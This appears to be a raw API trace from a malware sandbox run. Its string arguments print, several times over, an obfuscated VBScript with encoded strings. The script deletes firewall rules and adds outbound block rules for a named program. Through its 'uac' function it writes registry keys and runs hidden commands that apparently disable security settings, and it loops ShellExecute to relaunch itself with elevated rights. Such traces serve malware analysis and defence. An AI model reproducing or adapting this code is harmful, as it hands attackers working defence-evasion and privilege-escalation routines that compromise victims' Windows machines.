bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 37 [0226.314] wcsncmp (_String1=")\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 28 [0226.314] wcsncmp (_String1="\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned -30 [0226.314] wcsncmp (_String1="\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned -3 [0226.314] wcsncmp (_String1="\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd 